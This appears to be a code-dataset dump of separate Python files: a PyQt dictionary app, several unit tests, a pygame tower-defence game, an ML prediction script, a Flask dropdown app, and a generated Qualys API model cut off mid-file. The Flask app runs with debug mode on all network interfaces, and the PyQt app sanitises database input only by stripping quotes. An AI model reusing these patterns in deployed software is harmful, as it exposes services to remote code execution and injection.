{"seq_id":"412631091","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom definition import Definition\r\nfrom synonyms import Synonyms\r\nfrom antonym import Antonyms\r\nfrom sentences import Sentences\r\nfrom phonetics import Phonetics\r\nfrom dbConnect import DbConnect\r\nimport re\r\n\r\n\r\nclass Fetch_All(object):\r\n    def setupUi(self, MainWindow):\r\n        MainWindow.setObjectName(\"MainWindow\")\r\n        MainWindow.resize(800, 600)\r\n        self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n        self.centralwidget.setObjectName(\"centralwidget\")\r\n        self.head_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.head_label.setGeometry(QtCore.QRect(10, 10, 191, 16))\r\n        self.head_label.setAutoFillBackground(True)\r\n        self.head_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n        self.head_label.setObjectName(\"head_label\")\r\n        self.word_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.word_label.setGeometry(QtCore.QRect(40, 60, 41, 16))\r\n        self.word_label.setObjectName(\"word_label\")\r\n        self.word_line_edit = QtWidgets.QLineEdit(self.centralwidget)\r\n        self.word_line_edit.setGeometry(QtCore.QRect(90, 60, 181, 20))\r\n        self.word_line_edit.setObjectName(\"word_line_edit\")\r\n        self.defn_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.defn_label.setGeometry(QtCore.QRect(10, 120, 61, 16))\r\n        self.defn_label.setFrameShape(QtWidgets.QFrame.Panel)\r\n        self.defn_label.setObjectName(\"defn_label\")\r\n        self.defn_text_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.defn_text_label.setGeometry(QtCore.QRect(90, 120, 691, 101))\r\n        self.defn_text_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n        self.defn_text_label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)\r\n        self.defn_text_label.setWordWrap(True)\r\n        self.defn_text_label.setObjectName(\"defn_text_label\")\r\n        self.syn_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.syn_label.setGeometry(QtCore.QRect(10, 350, 61, 16))\r\n        self.syn_label.setFrameShape(QtWidgets.QFrame.Panel)\r\n        self.syn_label.setObjectName(\"syn_label\")\r\n        self.syn_text_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.syn_text_label.setGeometry(QtCore.QRect(90, 350, 691, 61))\r\n        self.syn_text_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n        self.syn_text_label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)\r\n        self.syn_text_label.setWordWrap(True)\r\n        self.syn_text_label.setObjectName(\"syn_text_label\")\r\n        self.antonym_text_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.antonym_text_label.setGeometry(QtCore.QRect(90, 430, 691, 31))\r\n        self.antonym_text_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n        self.antonym_text_label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)\r\n        self.antonym_text_label.setWordWrap(True)\r\n        self.antonym_text_label.setObjectName(\"antonym_text_label\")\r\n        self.ant_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.ant_label.setGeometry(QtCore.QRect(10, 430, 61, 16))\r\n        self.ant_label.setFrameShape(QtWidgets.QFrame.Panel)\r\n        self.ant_label.setObjectName(\"ant_label\")\r\n        self.phn_text_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.phn_text_label.setGeometry(QtCore.QRect(90, 480, 691, 21))\r\n        self.phn_text_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n        self.phn_text_label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)\r\n        self.phn_text_label.setWordWrap(True)\r\n        self.phn_text_label.setObjectName(\"phn_text_label\")\r\n        self.phn_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.phn_label.setGeometry(QtCore.QRect(10, 480, 61, 16))\r\n        self.phn_label.setFrameShape(QtWidgets.QFrame.Panel)\r\n        self.phn_label.setObjectName(\"phn_label\")\r\n        self.sent_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.sent_label.setGeometry(QtCore.QRect(10, 230, 61, 16))\r\n        self.sent_label.setFrameShape(QtWidgets.QFrame.Panel)\r\n        self.sent_label.setObjectName(\"sent_label\")\r\n        self.sent_text_label = QtWidgets.QLabel(self.centralwidget)\r\n        self.sent_text_label.setGeometry(QtCore.QRect(90, 230, 691, 111))\r\n        self.sent_text_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n        self.sent_text_label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)\r\n        self.sent_text_label.setWordWrap(True)\r\n        self.sent_text_label.setObjectName(\"sent_text_label\")\r\n        self.search_bttn = QtWidgets.QPushButton(self.centralwidget)\r\n        self.search_bttn.setGeometry(QtCore.QRect(290, 60, 75, 23))\r\n        self.search_bttn.setObjectName(\"search_bttn\")\r\n        self.save_bttn = QtWidgets.QPushButton(self.centralwidget)\r\n        self.save_bttn.setGeometry(QtCore.QRect(400, 510, 101, 23))\r\n        self.save_bttn.setObjectName(\"save_bttn\")\r\n        self.close_bttn = QtWidgets.QPushButton(self.centralwidget)\r\n        self.close_bttn.setGeometry(QtCore.QRect(320, 510, 75, 23))\r\n        self.close_bttn.setObjectName(\"close_bttn\")\r\n        MainWindow.setCentralWidget(self.centralwidget)\r\n        self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n        self.statusbar.setObjectName(\"statusbar\")\r\n        MainWindow.setStatusBar(self.statusbar)\r\n        self.search_bttn.clicked.connect(self.fetch_all_info)\r\n        self.close_bttn.clicked.connect(MainWindow.close)\r\n        self.save_bttn.clicked.connect(self.save_words)\r\n        self.retranslateUi(MainWindow)\r\n        QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n    def retranslateUi(self, MainWindow):\r\n        _translate = QtCore.QCoreApplication.translate\r\n        MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\r\n        self.head_label.setText(_translate(\"MainWindow\", \"Fetch all information about the word \"))\r\n        self.word_label.setText(_translate(\"MainWindow\", \"Word\"))\r\n        self.word_line_edit.setPlaceholderText(_translate(\"MainWindow\", \"Please enter your word here\"))\r\n        self.defn_label.setText(_translate(\"MainWindow\", \"Definition\"))\r\n        self.defn_text_label.setText(_translate(\"MainWindow\", \"Definition\"))\r\n        self.syn_label.setText(_translate(\"MainWindow\", \"Synonyms\"))\r\n        self.syn_text_label.setText(_translate(\"MainWindow\", \"Synonym\"))\r\n        self.antonym_text_label.setText(_translate(\"MainWindow\", \"Antonym\"))\r\n        self.ant_label.setText(_translate(\"MainWindow\", \"Antonyms\"))\r\n        self.phn_text_label.setText(_translate(\"MainWindow\", \"Phonetics\"))\r\n        self.phn_label.setText(_translate(\"MainWindow\", \"Phonetics\"))\r\n        self.sent_label.setText(_translate(\"MainWindow\", \"Sentences\"))\r\n        self.sent_text_label.setText(_translate(\"MainWindow\", \"Sentences\"))\r\n        self.search_bttn.setText(_translate(\"MainWindow\", \"Search\"))\r\n        self.save_bttn.setText(_translate(\"MainWindow\", \"Save this word\"))\r\n        self.close_bttn.setText(_translate(\"MainWindow\", \"Close\"))\r\n\r\n    def fetch_all_info(self):\r\n        try:\r\n            user_word=self.word_line_edit.text()\r\n            definition=Definition.search_word(self)\r\n            synonym=Synonyms.search_synonym(self)\r\n            antonym=Antonyms.search_antonym(self)\r\n            sentence=Sentences.get_sentences(self)\r\n            phonetic=Phonetics.search_phonetics(self)\r\n            \r\n        except Exception as e:\r\n            print('Something went wrong , Please try again !! ')\r\n        \r\n        return user_word,definition,synonym,antonym ,phonetic,sentence\r\n\r\n    def save_words(self):\r\n        \r\n        word_data=self.fetch_all_info()\r\n        user_word=str(word_data[0]).replace(\"'\",\"\")\r\n        definition=str(word_data[1]).replace(\"'\",\"\")\r\n        synonym=str(word_data[2]).replace(\"'\",\"\")\r\n        antonym=str(word_data[3]).replace(\"'\",\"\")\r\n        phonetics=str(word_data[4]).replace(\"'\",\"\")\r\n        sentences=str(word_data[5]).replace(\"'\",\"\")\r\n\r\n        db=DbConnect()\r\n        db.insert_word(user_word,definition,synonym,antonym ,phonetics,sentences)\r\n        print(\"This word is inserted\")\r\n        #db.fetch_all()\r\n        \r\n\r\n\r\n","sub_path":"Word Wall Application/fetchAll.py","file_name":"fetchAll.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"113406371","text":"#\n# Copyright (C) 2012-2013 Craig Hobbs\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\nimport sys\nimport unittest\n\n# Replace urllib2 with mock\nfrom . import charcoal_compat\nsys.modules['charcoal.compat'] = charcoal_compat\n\nfrom charcoal.url_request_resource import UrlRequestResourceFactory  # noqa\n\n# Restore urllib2\ndel sys.modules['charcoal.compat']\n\n\nclass TestUrlRequestResource(unittest.TestCase):\n\n    def test_url_request_resource(self):\n\n        # Create the resource type\n        factory = UrlRequestResourceFactory()\n\n        request = factory.open('url=http://myhost.com/mypath/')\n\n        # GET (trailing slash, append to URL)\n        response = request.send('myurl')\n        self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/myurl''')\n\n        # GET (trailing slash, append to URL - non-default timeout)\n        response = request.send('myurl', timeout=10)\n        self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/myurl''')\n\n        # GET (trailing slash, replace URL)\n        response = request.send('/myurl')\n        self.assertEqual(response, '''\\\nhttp://myhost.com/myurl''')\n\n        # GET (trailing slash, no URL)\n        response = request.send()\n        self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/''')\n\n        # GET (trailing slash, params only)\n        response = request.send('?a=1&b=2')\n        self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/?a=1&b=2''')\n\n        # Close the request\n        factory.close(request)\n\n        request = factory.open('url=http://myhost.com/mypath/myresource')\n\n        # GET (no trailing slash, replace resource)\n        response = request.send('myurl')\n        self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/myurl''')\n\n        # GET (no trailing slash, replace URL)\n        response = request.send('/myurl')\n        self.assertEqual(response, '''\\\nhttp://myhost.com/myurl''')\n\n        # GET (no trailing slash, empty URL)\n        response = request.send()\n        self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/myresource''')\n\n        # GET (no trailing slash, params only)\n        response = request.send('?a=1&b=2')\n        self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/myresource?a=1&b=2''')\n\n        # Close the request\n        factory.close(request)\n\n        request = factory.open('url=http://myhost.com/mypath/')\n\n        # POST\n        request.add_data('My POST data.')\n        response = request.send()\n        self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/\nMy POST data.''')\n\n        # POST with headers\n        request.add_data('My other POST data.')\n        request.add_header('MyHeader', 'MyValue')\n        request.add_unredirected_header('MyUnredirectedHeader', 'MyUnredirectedValue')\n        response = request.send()\n        self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/\n('MyHeader', 'MyValue')\n('MyUnredirectedHeader', 'MyUnredirectedValue')\nMy other POST data.''')\n\n        # Close the resource\n        factory.close(request)\n\n    def test_url_request_resource_propertyDelimiterEscape(self):\n\n        factory = UrlRequestResourceFactory()\n        request = factory.open('url=http://myhost.com/mypath/;username=user;password=a\\\\;bc;')\n        self.assertEqual(request.url, 'http://myhost.com/mypath/')\n        self.assertEqual(request.properties['username'], 'user')\n        self.assertEqual(request.properties['password'], 'a;bc')\n","sub_path":"charcoal/tests/test_url_request_resource.py","file_name":"test_url_request_resource.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"310185929","text":"#this is the python file\n#pip for windows and pip3 for any linux distro or mac\nfrom psutil import sensors_battery#if there is an error Module not found then run pip/pip3 install psutil in terminal\nfrom playsound import playsound as p#if there is an error Module not found then run pip/pip3 install playsound in terminal\nfrom notify2 import init , Notification#if there is an error Module not found then run pip/pip3 install notify2 in terminal\ninit(\"H\")\ndef notify(title , body , icon=\"\"):\n    Notification(title , body , icon).show()\nwhile True:\n    bettery = sensors_battery() \n    percent = int(bettery.percent)\n    plugged = bettery.power_plugged\n    if percent == 10:#10% battery is low you can write your percent instead of 10\n        if plugged == False:\n            notify(\"Battery is low\" , \"I am hungry\")\n            p(\"/home/devyansh/Documents/My work/Python/My exprement/galaxy_low_battery.mp3\")#instead of /home/devyansh/Documents/My work/Python/My exprement/galaxy_low_battery.mp3 give the path of your ringtone\n    elif percent == 100:#100% battery is full you can write your percent instead of 100\n        if plugged == True:\n            notify(\"Battery is full\" , \"I am getting fat\")\n            p(\"/home/devyansh/Documents/My work/Python/My exprement/galaxy_low_battery.mp3\")#instead of /home/devyansh/Documents/My work/Python/My exprement/galaxy_low_battery.mp3 give the path of your ringtone\n","sub_path":"README.py","file_name":"README.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"370180110","text":"import torch\n\nfrom ..objectives import inv_sqrtm\nfrom ._dcca import DCCA\n\n\nclass DCCA_NOI(DCCA):\n    \"\"\"\n    A class used to fit a DCCA model by non-linear orthogonal iterations\n\n\n    References\n    ----------\n    Wang, Weiran, et al. \"Stochastic optimization for deep CCA via nonlinear orthogonal iterations.\" 2015 53rd Annual Allerton Conference on Communication, Control, and Computing (Allerton). IEEE, 2015.\n\n    \"\"\"\n\n    def __init__(\n        self,\n        latent_dimensions: int,\n        N: int,\n        encoders=None,\n        r: float = 0,\n        rho: float = 0.2,\n        eps: float = 1e-9,\n        shared_target: bool = False,\n        **kwargs,\n    ):\n        super().__init__(\n            latent_dimensions=latent_dimensions,\n            encoders=encoders,\n            r=r,\n            eps=eps,\n            **kwargs,\n        )\n        self.N = N\n        self.covs = None\n        if rho < 0 or rho > 1:\n            raise ValueError(f\"rho should be between 0 and 1. rho={rho}\")\n        self.eps = eps\n        self.rho = rho\n        self.shared_target = shared_target\n        self.mse = torch.nn.MSELoss(reduction=\"sum\")\n        self.rand = torch.rand(N, self.latent_dimensions)\n\n    def loss(self, views, **kwargs):\n        z = self(views)\n        z_copy = [z_.detach().clone() for z_ in z]\n        self._update_covariances(z_copy, train=self.training)\n        covariance_inv = [inv_sqrtm(cov, self.eps) for cov in self.covs]\n        preds = [z_ @ covariance_inv[i] for i, z_ in enumerate(z_copy)]\n        loss = self.mse(z[0], preds[1]) + self.mse(z[1], preds[0])\n        self.covs = [cov.detach() for cov in self.covs]\n        return {\"objective\": loss}\n\n    def _update_covariances(self, z, train=True):\n        b = z[0].shape[0]\n        batch_covs = [self.N * z_.T @ z_ / b for z_ in z]\n        if train:\n            if self.covs is not None:\n                self.covs = [\n                    self.rho * self.covs[i] + (1 - self.rho) * batch_cov\n                    for i, batch_cov in enumerate(batch_covs)\n                ]\n            else:\n                self.covs = batch_covs\n        # pytorch-lightning runs validation once so this just fixes the bug\n        elif self.covs is None:\n            self.covs = batch_covs\n","sub_path":"cca_zoo/deep/_discriminative/_dcca_noi.py","file_name":"_dcca_noi.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"246478238","text":"import numpy as np\nimport pandas as pd\nimport pickle\n\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras_preprocessing.text import Tokenizer\n\n\ndef get_sequences(tokenizer, x, sentence_length):\n    sequences = tokenizer.texts_to_sequences(x)\n\n    return pad_sequences(sequences, maxlen=sentence_length)\n\n\ndef fix_arr(x):\n    return np.append([x[0]], list(x[1:]), axis=0)\n\n\ndef main():\n    text_tweets = pd.read_csv('../data/tweets_data.csv', delimiter='\\t')\n\n    X = text_tweets.Text.values\n\n    print('All data has been loaded')\n\n    SENTENCE_LENGTH = 167\n    NUM = 100000\n\n    tokenizer = Tokenizer(num_words=NUM)\n    tokenizer.fit_on_texts(X)\n\n    X_seq = get_sequences(tokenizer, X, SENTENCE_LENGTH)\n\n    print('Input data has been tokenized')\n\n    with open('../output/model.pkl', 'rb') as file:\n        model = pickle.load(file)\n\n    model.load_weights('../output/cnn-frozen-embeddings-37.hdf5')\n\n    print('Model has been loaded')\n\n    classes = np.array(['anger', 'happiness', 'love', 'neutral', 'sadness'])\n    predictions = model.predict(X_seq)\n    predicted_ix = np.apply_along_axis(lambda x: np.argmax(x), 1, predictions)\n\n    text_tweets['class_prediction'] = pd.Series(np.apply_along_axis(lambda x: classes[x], 0, predicted_ix))\n\n    text_tweets.to_csv('../output/predictions.csv', sep='\\t')\n\n    print('Predictions have been saved')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"twhelp/scripts/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"307878425","text":"import pygame\nfrom enemy import EnemyGroup\nfrom tower import TowerGroup\n\nimport os\nfrom settings import WIN_WIDTH, WIN_HEIGHT, FPS\n\n# initialization\npygame.init()\n# load image\nBACKGROUND_IMAGE = pygame.image.load(os.path.join(\"images\", \"Map.png\"))\nHP_IMAGE = pygame.image.load(os.path.join(\"images\", \"hp.png\"))\nHP_GRAY_IMAGE = pygame.image.load(os.path.join(\"images\", \"hp_gray.png\"))\n# set the title and icon\npygame.display.set_caption(\"My TD game\")\n\n\nclass Game:\n    def __init__(self):\n        self.win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n        self.bg_image = pygame.transform.scale(BACKGROUND_IMAGE, (WIN_WIDTH, WIN_HEIGHT))\n        self.hp_images = [pygame.transform.scale(HP_IMAGE, (40, 40)),\n                          pygame.transform.scale(HP_GRAY_IMAGE, (40, 40))]\n        self.enemies = EnemyGroup()\n        self.towers = TowerGroup()\n        self.base = pygame.Rect(430, 90, 195, 130)\n\n    @staticmethod\n    def select(group, x, y):\n        \"\"\"\n        Bonus) If the item is clicked, change the state of whether the tower is selected. (tower.is_clicked(), tower.get_selected())\n        :param group: Group()\n        :param x: mouse pos x\n        :param y: mouse pos y\n        :return: None\n        \"\"\"\n        for tower in group.get():  # get one tower each loop\n            if tower.is_clicked(x, y):  # detect if tower.is_clicked\n                tower.get_selected(True)\n            else:\n                tower.get_selected(False)\n\n\n    def collide_base(self, enemy):\n        \"\"\"\n        Return True if the enemy collide with base.\n        :param enemy: class Enemy()\n        :return: Bool\n        \"\"\"\n        en_x, en_y = enemy.get_pos()\n        x, y = self.base.center\n        width, height = self.base.w, self.base.h\n        if x - width//2 < en_x < x + width//2 and y - height//2 < en_y < y + height//2:\n            return True\n        return False\n\n    def draw(self):\n        \"\"\"\n        Draw everything in this method.\n        :return: None\n        \"\"\"\n        # draw background\n        self.win.blit(self.bg_image, (0, 0))\n        # draw enemy\n        for en in self.enemies.get():\n            en.draw(self.win)\n        # draw tower\n        for tw in self.towers.get():\n            tw.draw(self.win)\n\n    def game_run(self):\n        run = True\n        clock = pygame.time.Clock()\n        while run:\n            clock.tick(FPS)\n            # event loop\n            x, y = pygame.mouse.get_pos()\n            for event in pygame.event.get():\n                if event.type == pygame.QUIT:\n                    run = False  # quit game\n                if event.type == pygame.KEYDOWN:\n                    if event.key == pygame.K_n and self.enemies.is_empty():\n                        self.enemies.add(3)  # 3 enemies are ready for the next wave\n                if event.type == pygame.MOUSEBUTTONDOWN:\n                    self.select(self.towers, x, y)\n\n            # tower loop\n            for tw in self.towers.get():\n                tw.attack(self.enemies)\n\n            # enemy loop\n            self.enemies.campaign()  # let the enemy go on an expedition\n            for en in self.enemies.get():\n                en.move()\n                if en.died():\n                    self.enemies.retreat(en)\n                # delete the object when it reach the base\n                if self.collide_base(en):\n                    self.enemies.retreat(en)\n\n            # draw everything\n            self.draw()\n            pygame.display.update()\n        pygame.quit()\n\n\nif __name__ == '__main__':\n    covid_game = Game()\n    covid_game.game_run()","sub_path":"F34086074-Lab4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"478397225","text":"from flask import Flask, render_template, request, url_for, redirect\nimport pandas as pd\n\n\napp = Flask(__name__)\nDATABASE_PATH = '/home/ubuntu/nei_filtered_sj.csv'\nDF = pd.read_csv(DATABASE_PATH)\nZIPS = DF.postal_code.unique()\n\ndef get_panda_data(zip,by):\n    df = pd.read_csv(DATABASE_PATH)\n    df = df.loc[df['postal_code'] == int(zip)]\n    df = df[['zpid','address','city','postal_code','price','price_sqft','sale_price_sign','pricepersqft_sign','yearSold','lat','lon','url']].copy()\n\n    if(by=='price'):\n        df = df.sort_values(by='sale_price_sign', ascending=True).head(10)\n    else:\n        df = df.sort_values(by='pricepersqft_sign', ascending=True).head(10)\n    tags_html = df.to_html(escape=False)\n    return tags_html\n\n@app.route('/index')\n@app.route('/')\ndef index():\n    return render_template(\"dropdown.html\", postal_codes=ZIPS)\n\n@app.route('/show', methods=['GET', 'POST'])\ndef login():\n    if request.method == \"POST\":\n        zip = request.form.get(\"postal_code\", None)\n        by = request.form.get(\"by\", None)\n        if zip!=\"0\":\n            html_data = get_panda_data(zip,by)\n            return render_template(\"dropdown2.html\", postal_codes=ZIPS, postal_code = zip, html_data = html_data)\n    return render_template(\"dropdown2.html\", postal_codes=ZIPS)\n\n\nif __name__ == '__main__':\n    app.run(debug=True, host=\"0.0.0.0\", port=80)\n","sub_path":"dropdown.py","file_name":"dropdown.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"582800771","text":"import unittest\nimport responses\n\nimport pillarsdk\nimport pillarsdk.exceptions as sdk_exceptions\n\nmock = responses.RequestsMock(assert_all_requests_are_fired=True)\n\n\nclass ProjectsTests(unittest.TestCase):\n    def setUp(self):\n        self.endpoint = 'http://localhost:12345'\n        self.api = pillarsdk.Api(\n            endpoint=self.endpoint,\n            username='',\n            password='',\n            token='jemoeder',\n        )\n\n    @mock.activate\n    def test_find_project_happy(self):\n        project_id = 24 * 'a'\n\n        # Finding the existing project\n        mock.add(responses.GET,\n                 '%s/projects' % self.endpoint,\n                 json={'_items': [{\n                     '_id': project_id,\n                     '_etag': 'awesome-etag',\n                     'name': 'test-project'}\n                 ]})\n\n        proj = pillarsdk.Project.find_one({'_id': project_id}, api=self.api)\n        self.assertEqual(project_id, proj['_id'])\n\n    @mock.activate\n    def test_find_project_unhappy_empty_response(self):\n        project_id = 24 * 'a'\n\n        # Finding the existing project\n        mock.add(responses.GET,\n                 '%s/projects' % self.endpoint,\n                 json={})\n\n        self.assertRaises(sdk_exceptions.ResourceNotFound,\n                          pillarsdk.Project.find_one,\n                          {'_id': project_id}, api=self.api)\n\n    @mock.activate\n    def test_find_project_unhappy_404_response(self):\n        project_id = 24 * 'a'\n\n        # Finding the existing project\n        mock.add(responses.GET,\n                 '%s/projects' % self.endpoint,\n                 json={'_items': [{\n                     '_id': project_id,\n                     '_etag': 'awesome-etag',\n                     'name': 'test-project'}\n                 ]},\n                 status=404)\n\n        self.assertRaises(sdk_exceptions.ResourceNotFound,\n                          pillarsdk.Project.find_one,\n                          {'_id': project_id}, api=self.api)\n","sub_path":"tests/test_projects.py","file_name":"test_projects.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"23873116","text":"# coding: utf-8\n\n\"\"\"\n    Container Security APIs\n\n    All features of the Container Security are available through REST APIs. Access support information at www.qualys.com/support/ Permissions: User must have the Container module enabled User must have API ACCESS permission    # noqa: E501\n\n    The version of the OpenAPI document: 1.0.0\n    Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re  # noqa: F401\n\nimport six\n\nfrom qualys_cs_api.configuration import Configuration\n\n\nclass RegistryResponse(object):\n    \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n    Ref: https://openapi-generator.tech\n\n    Do not edit the class manually.\n    \"\"\"\n\n    \"\"\"\n    Attributes:\n      openapi_types (dict): The key is attribute name\n                            and the value is attribute type.\n      attribute_map (dict): The key is attribute name\n                            and the value is json key in definition.\n    \"\"\"\n    openapi_types = {\n        'aws_account_id': 'str',\n        'aws_region': 'str',\n        'created': 'str',\n        'docker_hub_org': 'str',\n        'last_scanned': 'str',\n        'provider_type': 'str',\n        'registry_type': 'str',\n        'registry_uri': 'str',\n        'registry_uuid': 'str',\n        'repo_count': 'int',\n        'schedule_status_list': 'dict(str, int)',\n        'total_images': 'int',\n        'total_scanned_images': 'int',\n        'total_vulnerable_images': 'int',\n        'updated': 'str'\n    }\n\n    attribute_map = {\n        'aws_account_id': 'awsAccountId',\n        'aws_region': 'awsRegion',\n        'created': 'created',\n        'docker_hub_org': 'dockerHubOrg',\n        'last_scanned': 'lastScanned',\n        'provider_type': 'providerType',\n        'registry_type': 'registryType',\n        'registry_uri': 'registryUri',\n        'registry_uuid': 'registryUuid',\n        'repo_count': 'repoCount',\n        'schedule_status_list': 'scheduleStatusList',\n        'total_images': 'totalImages',\n        'total_scanned_images': 'totalScannedImages',\n        'total_vulnerable_images': 'totalVulnerableImages',\n        'updated': 'updated'\n    }\n\n    def __init__(self, aws_account_id=None, aws_region=None, created=None, docker_hub_org=None, last_scanned=None, provider_type=None, registry_type=None, registry_uri=None, registry_uuid=None, repo_count=None, schedule_status_list=None, total_images=None, total_scanned_images=None, total_vulnerable_images=None, updated=None, local_vars_configuration=None):  # noqa: E501\n        \"\"\"RegistryResponse - a model defined in OpenAPI\"\"\"  # noqa: E501\n        if local_vars_configuration is None:\n            local_vars_configuration = Configuration()\n        self.local_vars_configuration = local_vars_configuration\n\n        self._aws_account_id = None\n        self._aws_region = None\n        self._created = None\n        self._docker_hub_org = None\n        self._last_scanned = None\n        self._provider_type = None\n        self._registry_type = None\n        self._registry_uri = None\n        self._registry_uuid = None\n        self._repo_count = None\n        self._schedule_status_list = None\n        self._total_images = None\n        self._total_scanned_images = None\n        self._total_vulnerable_images = None\n        self._updated = None\n        self.discriminator = None\n\n        if aws_account_id is not None:\n            self.aws_account_id = aws_account_id\n        if aws_region is not None:\n            self.aws_region = aws_region\n        if created is not None:\n            self.created = created\n        if docker_hub_org is not None:\n            self.docker_hub_org = docker_hub_org\n        if last_scanned is not None:\n            self.last_scanned = last_scanned\n        if provider_type is not None:\n            self.provider_type = provider_type\n        if registry_type is not None:\n            self.registry_type = registry_type\n        if registry_uri is not None:\n            self.registry_uri = registry_uri\n        if registry_uuid is not None:\n            self.registry_uuid = registry_uuid\n        if repo_count is not None:\n            self.repo_count = repo_count\n        if schedule_status_list is not None:\n            self.schedule_status_list = schedule_status_list\n        if total_images is not None:\n            self.total_images = total_images\n        if total_scanned_images is not None:\n            self.total_scanned_images = total_scanned_images\n        if total_vulnerable_images is not None:\n            self.total_vulnerable_images = total_vulnerable_images\n        if updated is not None:\n            self.updated = updated\n\n    @property\n    def aws_account_id(self):\n        \"\"\"Gets the aws_account_id of this RegistryResponse.  # noqa: E501\n\n\n        :return: The aws_account_id of this RegistryResponse.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._aws_account_id\n\n    @aws_account_id.setter\n    def aws_account_id(self, aws_account_id):\n        \"\"\"Sets the aws_account_id of this RegistryResponse.\n\n\n        :param aws_account_id: The aws_account_id of this RegistryResponse.  # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._aws_account_id = aws_account_id\n\n    @property\n    def aws_region(self):\n        \"\"\"Gets the aws_region of this RegistryResponse.  # noqa: E501\n\n\n        :return: The aws_region of this RegistryResponse.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._aws_region\n\n    @aws_region.setter\n    def aws_region(self, aws_region):\n        \"\"\"Sets the aws_region of this RegistryResponse.\n\n\n        :param aws_region: The aws_region of this RegistryResponse.  # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._aws_region = aws_region\n\n    @property\n    def created(self):\n        \"\"\"Gets the created of this RegistryResponse.  # noqa: E501\n\n\n        :return: The created of this RegistryResponse.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._created\n\n    @created.setter\n    def created(self, created):\n        \"\"\"Sets the created of this RegistryResponse.\n\n\n        :param created: The created of this RegistryResponse.  # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._created = created\n\n    @property\n    def docker_hub_org(self):\n        \"\"\"Gets the docker_hub_org of this RegistryResponse.  # noqa: E501\n\n\n        :return: The docker_hub_org of this RegistryResponse.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._docker_hub_org\n\n    @docker_hub_org.setter\n    